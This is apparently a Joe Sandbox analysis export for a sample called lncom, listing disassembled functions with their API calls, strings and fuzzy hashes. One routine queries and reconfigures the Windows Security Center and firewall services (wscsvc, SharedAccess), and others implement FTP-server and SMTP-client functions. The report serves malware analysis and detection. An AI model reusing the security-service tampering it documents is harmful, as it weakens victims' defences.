Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: abf03118eec621ec2ce58bf1ee73f5777cbeeede626a4f37571aa9bfc4534625
Instruction ID: c0a3ff31f55a76c53ae59bea124b3228897ed67167f0abfa3bc88f9b6c4f171e
Opcode Fuzzy Hash: abf03118eec621ec2ce58bf1ee73f5777cbeeede626a4f37571aa9bfc4534625
Instruction Fuzzy Hash: 4BF06B756002019FCE00FFBAD9C6E5B779D9F0430A704849AB908DF257CA69E8149B79

Uniqueness

Uniqueness Score: -1.00%

Function 0043ADAC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 290COMMON

Download Yara Rule

APIs

@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM ref: 0043B061
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM ref: 0043B0CA
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM ref: 0043B13F

Part of subcall function 0043ACFC: @Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM(?,00000000,0043AD9E), ref: 0043AD6C

@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM ref: 0043B1A8

Strings

500 '%s': command not understood., xrefs: 0043B09E, 0043B17A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CtrlFtpsrvc@Send$Answer$qqrp22Ftpsrv@Server@SmallSocketr28String$iuc$255%System@%$AnsiAnswer$qqr17Socket@StringSystem@
String ID: 500 '%s': command not understood.
API String ID: 3895286621-864546098
Opcode ID: 22558a04e5337cffa4d2c1a28aee538db11d9659a28fea2c7f5fca575618132d
Instruction ID: 0b76f1a2036d93d8a8703e9bb4ca2d9daa789e78cd51065ffc9100c411fbacd4
Opcode Fuzzy Hash: 22558a04e5337cffa4d2c1a28aee538db11d9659a28fea2c7f5fca575618132d
Instruction Fuzzy Hash: 78D12BB494425D8FCB21CF54C895BEEBBB4EB09304F6091EAD508A3251D734AF86CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0046F26C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

Part of subcall function 00465954: GetActiveWindow.USER32 ref: 00465957
Part of subcall function 00465954: GetCurrentThreadId.KERNEL32 ref: 0046596C
Part of subcall function 00465954: EnumThreadWindows.USER32(00000000,Function_00065934), ref: 00465972

Part of subcall function 0046F0C4: GetCursor.USER32(?), ref: 0046F0DF
Part of subcall function 0046F0C4: GetIconInfo.USER32(00000000,?), ref: 0046F0E5

ClientToScreen.USER32(?,?), ref: 0046F39A
OffsetRect.USER32(?,?,?), ref: 0046F3B1
OffsetRect.USER32(?,?,?), ref: 0046F4DB

Part of subcall function 0046EEB8: SetTimer.USER32(00000000,00000000,?,0046CED0), ref: 0046EED2

Strings

H5F, xrefs: 0046F293, 0046F5F8
d'G, xrefs: 0046F417

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
String ID: H5F$d'G
API String ID: 2591747986-998236756
Opcode ID: 009b7667bd332239d5c96ac651778af02054c50940ca83a1eb425272f3e3f318
Instruction ID: 8742c20e7def2431361ddd284f2f13beab5efffa44ff6e3776e30b6e77fc16ce
Opcode Fuzzy Hash: 009b7667bd332239d5c96ac651778af02054c50940ca83a1eb425272f3e3f318
Instruction Fuzzy Hash: 3BD1E575A00208CFCB14DFA8D884A9EB7F5BF08304F1045AAE585EB366EB35AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA64 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202COMMON

Download Yara Rule

APIs

@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM ref: 0042AB32
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM ref: 0042ABD4

Strings

Dedected burute force atack from your ip adress (, xrefs: 0042AAF5
8, xrefs: 0042ACC2
Rdswds^i`r^cddo^lnehghde , xrefs: 0042ABA6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AnsiAnswer$qqr17CtrlFtpsrvc@SendSocket@StringSystem@
String ID: 8$Dedected burute force atack from your ip adress ($Rdswds^i`r^cddo^lnehghde
API String ID: 2277310912-717765408
Opcode ID: aeb746878666052100749e947f3f550f9086d5c5b0569a907b0bc6154f858a23
Instruction ID: 9daf8961729dbc9687b22840adaf144fefd6df46878d5f51494bf7874c83cf58
Opcode Fuzzy Hash: aeb746878666052100749e947f3f550f9086d5c5b0569a907b0bc6154f858a23
Instruction Fuzzy Hash: 70817D34A1025DDBDB00EFD5E881ADDB7B5FF86308F50406AE800AB356DB789946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004425E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168windowCOMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv.LNCOM ref: 00442725
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv.LNCOM ref: 00442764

Strings

Program error: FNext is nil, xrefs: 004427F2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Client@CustomSmtpSmtpprot@$DisplayErrorLastMessage$qqrvResponse$qqrv
String ID: Program error: FNext is nil
API String ID: 1366724814-3298919709
Opcode ID: d30c6a16aa41366c172a06768debd817483fe3a34ea7cb205fe6822f26e642fa
Instruction ID: 044537be6c514b47f74236e5359d0f97db4910738e6b34233582c32f847b74ac
Opcode Fuzzy Hash: d30c6a16aa41366c172a06768debd817483fe3a34ea7cb205fe6822f26e642fa
Instruction Fuzzy Hash: 2271EA34A00149DFEB00EF98C685BADB7F1FF48305F6081A5E445AB366CBB8AE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00443240 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(?,?,00000005,00000000,00000000,?,0044321D), ref: 00443349
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(004433FC,?,?,?,00000005,00000000,00000000,?,0044321D), ref: 004433AC

Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM(00000000,00442DC3), ref: 00442CED
Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442D9D

Strings

(4D, xrefs: 00443365, 0044330C
RCPT TO:<, xrefs: 00443368
RCPT TO:, xrefs: 00443337

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: SmtpSmtpprot@$Client@Custom$AnsiAsync$qqr21ExecRequest17StateStringpxusxiynpqqrv$vSystem@$Change$qqr19CheckReady$qqrv
String ID: (4D$RCPT TO:$RCPT TO:<
API String ID: 4067243851-3242351485
Opcode ID: 4d918c4617e6d3f9982b77ddacb940aa743c60bb886f32028a22534084fe1724
Instruction ID: 375d4bcd17e46850e5dd2e9ffd02fc480360eb504c6260b08805bc2f9c77970e
Opcode Fuzzy Hash: 4d918c4617e6d3f9982b77ddacb940aa743c60bb886f32028a22534084fe1724
Instruction Fuzzy Hash: A651E238A00209EFDB00DF95C585AEEB7B5EF08705F6080A6E901AB351D774AE05DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00440D3C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

APIs

@Ftpsrvt@FileUtcStr$qqr17System@AnsiString.LNCOM(00000000,00440E7B), ref: 00440E02

Strings

550 %s, xrefs: 00440E57
213 %s, xrefs: 00440E26
550 '%s': no such file or directory., xrefs: 00440DCF
UTC File time retrieval failed, xrefs: 00440E46

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AnsiFileFtpsrvt@Str$qqr17StringSystem@
String ID: 213 %s$550 %s$550 '%s': no such file or directory.$UTC File time retrieval failed
API String ID: 3437406060-2279499328
Opcode ID: f6e01a0d5ecd443d9f230a98716017ee30f7a5cac4e48d68a6da204673bbcada
Instruction ID: ef9b491cb8f78a19e77ea8487f01efd3ece057b71fd62267afc6087e89374569
Opcode Fuzzy Hash: f6e01a0d5ecd443d9f230a98716017ee30f7a5cac4e48d68a6da204673bbcada
Instruction Fuzzy Hash: 24413F709042489FEB00DF98D451BEEBBF4EB4D314F60847AE904E7381D7789A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004928F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0049291A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00492969,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0049294D
RegCloseKey.ADVAPI32(?,00492970,00000000,?,00000004,00000000,00492969,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00492963

Strings

FPUMaskValue, xrefs: 00492944
SOFTWARE\Borland\Delphi\RTL, xrefs: 00492910

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 48784f7d76f203d83a942c46348337976009cd7b5e71f374e8a600a138c2fa50
Instruction ID: 187287c11cf04eae3cd86d18485dbc2c1706277a60143b0b18407b2a02f4c9d0
Opcode Fuzzy Hash: 48784f7d76f203d83a942c46348337976009cd7b5e71f374e8a600a138c2fa50
Instruction Fuzzy Hash: 890175B9A40308BEEF21DB90DD42BFA77ACDB44700F100077BA14E6590E6B85A10D75D

Uniqueness

Uniqueness Score: -1.00%

Function 00487254 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,00487244,?), ref: 00487274
UnregisterClassA.USER32(TThreadWindow,00400000), ref: 0048729D
RegisterClassA.USER32(005D532C), ref: 004872A7

Strings

DrH, xrefs: 00487268, 00487297, 004872C7
TThreadWindow, xrefs: 0048729C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: DrH$TThreadWindow
API String ID: 3749476976-3372100345
Opcode ID: 8b63eeba5768a8c55ccae8f591f9cfba0aa8fdfdd1f6c45ced5cb6603932978f
Instruction ID: 50384aeaa90201b5dfa8c77f5777777db6c15e27ed8b6968a8cf76b5914ce002
Opcode Fuzzy Hash: 8b63eeba5768a8c55ccae8f591f9cfba0aa8fdfdd1f6c45ced5cb6603932978f
Instruction Fuzzy Hash: CCF022306421085FCB20EFACDC81FAF33D8AB08300F540A47FA00CB395E66ADC089769

Uniqueness

Uniqueness Score: -1.00%

Function 004104D8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 00410505

Part of subcall function 00408478: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 0040848F
Part of subcall function 00408478: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 004084AE
Part of subcall function 00408478: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 004084D8
Part of subcall function 00408478: CharLowerA.USER32(?,?), ref: 0040855B
Part of subcall function 00408478: OpenServiceA.ADVAPI32(?,?,00000020), ref: 0040857E
Part of subcall function 00408478: ControlService.ADVAPI32(?,00000001,?,?,?,00000020), ref: 0040858F
Part of subcall function 00408478: CloseServiceHandle.ADVAPI32(?,?,00000001,?,?,?,00000020), ref: 00408597
Part of subcall function 00408478: CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 004085AE

Part of subcall function 0040871C: OpenSCManagerA.ADVAPI32(00000000,00000000,400F003F,?,004085D7,?,00000002), ref: 00408733
Part of subcall function 0040871C: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 00408752
Part of subcall function 0040871C: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 0040877C
Part of subcall function 0040871C: CharLowerA.USER32(?,?), ref: 004087FF
Part of subcall function 0040871C: OpenServiceA.ADVAPI32(?,?,00000001), ref: 00408826
Part of subcall function 0040871C: QueryServiceConfigA.ADVAPI32(?,00000000,00000000,?,?,?,00000001), ref: 00408839

Part of subcall function 0040871C: QueryServiceConfigA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 00408857
Part of subcall function 0040871C: CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 0040885F
Part of subcall function 0040871C: OpenServiceA.ADVAPI32(?,?,00000002,?,?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 00408875
Part of subcall function 0040871C: ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000002,?,?), ref: 004088B0
Part of subcall function 0040871C: CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000002,?), ref: 004088B8
Part of subcall function 0040871C: CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 004088CF

Strings

wscsvc, xrefs: 00410517
wscsvc, xrefs: 00410524
SharedAccess, xrefs: 0041053E
SharedAccess, xrefs: 00410531

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Service$CloseHandleOpen$EnumServicesStatus$Config$CharLowerManagerQuery$ChangeControlVersion
String ID: SharedAccess$SharedAccess$wscsvc$wscsvc
API String ID: 3592101696-2497618592
Opcode ID: 91f21c25799168d0144c7d1d4d70d0875f80228f2a5f0a166f10241cb5c1c062
Instruction ID: 55d92ddacbb102d7055f0b8947cbf887cfe523acd4f29aa918e88d0dfa93a4ad
Opcode Fuzzy Hash: 91f21c25799168d0144c7d1d4d70d0875f80228f2a5f0a166f10241cb5c1c062
Instruction Fuzzy Hash: 07F0FE7164430859DB10A6959D07F9A7669EB40714F10407FE548751C0FEB5598486BF

Uniqueness

Uniqueness Score: -1.00%

Function 004344A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_getpeername$qqrir11sockaddr_inri.LNCOM ref: 004344DF

Part of subcall function 0043219C: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 004321B9

@Wsocket@WSocket_inet_ntoa$qqr7in_addr.LNCOM ref: 004344EB

Part of subcall function 00432020: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00432037

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00434508

Strings

error, xrefs: 004344B3
GetPeerName, xrefs: 00434500

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiSocketStringSystem@$Proc$qqrx17$CustomError$qqr17Socket@Socket_getpeername$qqrir11sockaddr_inriSocket_inet_ntoa$qqr7in_addr
String ID: GetPeerName$error
API String ID: 2672848856-128068918
Opcode ID: e424d0b2e8a7deb83226b3a1257b944b1a058136a10b74bd43584468aceb9d10
Instruction ID: bd46e653b59b0a1d66784708ce6df6adea91da311f8746f713cfebc4c248ee05
Opcode Fuzzy Hash: e424d0b2e8a7deb83226b3a1257b944b1a058136a10b74bd43584468aceb9d10
Instruction Fuzzy Hash: E50131B4E0020A9BCF00DF95D9429EFB7B1AF48308F105166E614A7356E739AD058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00434538 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_getpeername$qqrir11sockaddr_inri.LNCOM ref: 00434573

Part of subcall function 0043219C: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 004321B9

@Wsocket@WSocket_ntohs$qqrus.LNCOM ref: 00434580

Part of subcall function 00431EEC: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431F02

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 0043459A

Strings

GetPeerPort, xrefs: 00434592
error, xrefs: 00434547

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiSocketStringSystem@$Proc$qqrx17$CustomError$qqr17Socket@Socket_getpeername$qqrir11sockaddr_inriSocket_ntohs$qqrus
String ID: GetPeerPort$error
API String ID: 203399403-2453009154
Opcode ID: 214b5883cd0fd4bd604d9e3f244cccac534542de6e605379f82ca3fcf1e28b40
Instruction ID: eafa0a6249ee7f5cac1a8f5dc9ca67ddcfa06e5acf26e9313cd0a506e62bfc14
Opcode Fuzzy Hash: 214b5883cd0fd4bd604d9e3f244cccac534542de6e605379f82ca3fcf1e28b40
Instruction Fuzzy Hash: AAF062B4E0010E9BCB00EBD5C5825FFB7B5AF88304F10956AE654A7391E739AD018BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00454DF4 Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00454EC6
OffsetRect.USER32(?,00000001,00000001), ref: 00454F17
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454F4C
